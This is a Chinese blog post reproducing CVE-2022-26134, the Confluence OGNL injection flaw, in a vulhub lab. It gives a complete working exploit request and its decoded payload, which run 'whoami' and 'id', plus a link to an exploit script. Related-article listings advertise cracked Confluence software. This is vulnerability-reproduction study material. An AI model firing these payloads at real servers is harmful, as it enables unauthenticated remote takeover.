Atlassian Confluence_远程代码执行(CVE-2022-26134)

最新推荐文章于 2024-07-18 10:27:28 发布
最新推荐文章于 2024-07-18 10:27:28 发布
阅读量1.6k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45495060/article/details/125143986
版权

漏洞描述

Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Server 和 Data Center 存在OGNL 注入漏洞,该漏洞源于Confluence,xwork-1.0.3-atlassian-8.jar 对 OGNL 表达式过滤不严谨,导致存在 OGNL 表达式注入漏洞,攻击者可以通过构造发送特定HTTP请求利用此漏洞。成功利用后可对 Confluence 服务器进行远程命令执行。

影响版本

  • Confluence Server and Data Center >= 1.3.0
  • Confluence Server and Data Center < 7.4.17
  • Confluence Server and Data Center < 7.13.7
  • Confluence Server and Data Center < 7.14.3
  • Confluence Server and Data Center < 7.15.2
  • Confluence Server and Data Center < 7.16.4
  • Confluence Server and Data Center < 7.17.4
  • Confluence Server and Data Center < 7.18.1

环境搭建 

这里直接用vulhub里的环境,启动以后需要申请试用版许可证,配置好相关信息即可

docker-compose up -d

 漏洞复现

漏洞利用发送如下请求即可执行任意命令,并在HTTP返回头中获取执行结果:

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: 127.0.0.1:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=8D0D4FB7E6B7456378BF7388889C86C0
Connection: close

测试POC

%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

工具复现:https://github.com/Nwqda/CVE-2022-26134(大佬写的脚本)

 修复建议

升级到Atlassian Confluence Server and Data Center至安全版本。

一笼管汤包
关注
专栏目录
【漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
做自己喜欢的事,并将其发挥到极致!
06-06 2249
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
Atlassian Confluence CVE-2022-26134 RCE漏洞
sxr__nc的博客
04-22 1115
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
Atlassian Confluence 远程代码执行/CVE-2022-26134
PolarPeak的博客
06-05 1036
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞(CVE-2022-26134)的安全公告。该漏洞的CVSS评分为10分,目前漏洞细节与PoC已被公开披露,且被检测到存在在野利用。 Atlassian ConfluenceAtlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自...
【漏洞复现】CVE-2024-21683:Confluence远程代码执行漏洞
最新发布
网络安全从业者的学习笔记
07-18 909
Atlassian Confluence 是一款功能强大的企业协作软件,专为团队协作、知识管理和内容共享而设计。它提供了一个集中的平台,团队可以共同创建、编辑和共享文档、会议记录、项目计划以及技术文档。经过管理员身份验证的远程威胁者可构造恶意请求,利用该漏洞在受影响的实例上执行任意代码,而无需用户交互。
企业知识管理与协同软件系统Atlassian Confluence 远程代码执行漏洞
weixin_68647219的博客
08-01 3510
Atlassian Confluence 远程代码执行漏洞高危漏洞,该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过修改HTTP请求头中的Content-Type值所造成的可能导致远程攻击者构造发送恶意的数据包,利用该漏洞进而在受影响服务器上执行任意系统命令。
【高危】Atlassian Confluence 远程代码执行漏洞
murphysec的博客
07-25 506
Confluence 是由 Atlassian 开发的知识管理与协同软件,通常在企业内部用作wiki系统。Confluence 7.19.8到8.2.0之前的版本中存在远程代码执行漏洞,具有登录权限的攻击者无需用户交互即可在 Confluence 服务器中执行任意命令。
Atlassian Confluence 远程代码执行 CVE-2022-26134漏洞复现
m0_60635609的博客
04-07 1006
Atlassian ConfluenceAtlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。(Confluence还有个RCE,为了好区分,我习惯把是CVE-2021-26084这个叫OGNL表达式注入命令执行漏洞,在后续的文章,我也会复现CVE-2021-26084)
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134漏洞分析与防护
不忘初心,护天下安全!
06-24 984
Confluence是一款专业的企业知识管理与协同软件,常用于企业wiki的构建,支持团队成员间开展信息共享、文档协作、集体讨论和信息推送等工作,具有较为便捷的编辑和站点管理特性。该软件由Atlassian公司负责开发和维护。2022年6月3日,国家信息安全漏洞共享平台(CNVD)收录了Confluence远程代码执行漏洞(CNVD-2022-43094,对应CVE-2022-26134)。在Atlassian Confluence Server and Data Center上存在OGNL注入漏洞,恶意攻
【漏洞复现】CVE-2022-26134 Atlassian Confluence_远程代码执行
m0_53121608的博客
07-13 201
【漏洞复现】CVE-2022-26134 Atlassian Confluence_远程代码执行
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)风险通告及POC复现
qq_18209847的博客
06-07 3094
信息安全部监测到Atlassian Confluence Server and Data Center (CVE-2022-26134远程代码执行漏洞。
atlassian-confluence-7.9.3.rar
12-12
atlassian-confluence-7.9.3安装及相关工具,包含原始文件、补丁和mysqljar。一键式使用和安装包
atlassian-confluence破解文件及教程,亲测可用
01-16
atlassian-confluence破解文件已说明,6.3亲测可用。目前atlassian jira crowd confluence fisheye crucible 均安装破解成功 bamboo bitbucket还在研究
Atlassian Confluence 6.0.3安装文档
10-28
Atlassian Confluence 6.0.3安装文档包含内容:1、wiki的安装步骤;2、旧系统迁移中碰到的无法编辑和问题和解决方案;3、wiki源码、连接mysql用的jar包和相关的汉化包。
Atlassian - Confluence 知识管理与企业社交
Rock-Jeep的专栏
09-12 3048
[+] Confluence - 知识管理与企业社交 典型客户 Confluence - 知识管理与企业社交 Confluence 结合强大的在线编辑功能,与Office高度集成以及大量的插件扩展,帮助人们更好的协作与共享信息。 打破组织架构的壁垒,无论你隶属于哪个部门、身处哪个职位,企业所有员工都在同一页面上分享知识。
Atlassian Confluence 远程代码执行漏洞分析(CVE-2023-22518)
hackzkaq的博客
11-09 683
由于漏洞易于利用且具有严重破坏性(导致数据丢失), 因此本文章中不会公开该漏洞的利用程序. 感兴趣的读者, 可以按照文章中的思路来复现该漏洞. 请注意, 本文仅供学习目的使用.
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)复现
weixin_42489549的博客
06-29 8997
CVE-2022-26134 Confluence远程命令执行漏洞复现
漏洞复现--Confluence远程代码执行漏洞(CVE-2023-22527)
qq_53003652的博客
01-23 1529
Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。微步漏洞团队于近日捕获到Confluence远程代码执行漏洞(CVE-2023-22527)情报,攻击者可在无需登录的情况下,利用该漏洞构造恶意请求,导致远程代码执行
CVE-2021-26086
05-22
CVE-2021-26086是一个影响Atlassian Confluence Server和Data Center的高危漏洞。攻击者可以利用这个漏洞执行远程代码,可能导致服务器完全被控制。这个漏洞是因为Confluence Server和Data Center中的Ognl表达式注入漏洞造成的,攻击者可以通过发送经过修改的HTTP请求,注入恶意代码,从而远程执行代码Atlassian已经发布了相关的安全公告,并提供了补丁程序。如果您正在使用受影响的版本,请立即更新到最新版本以保护您的系统安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值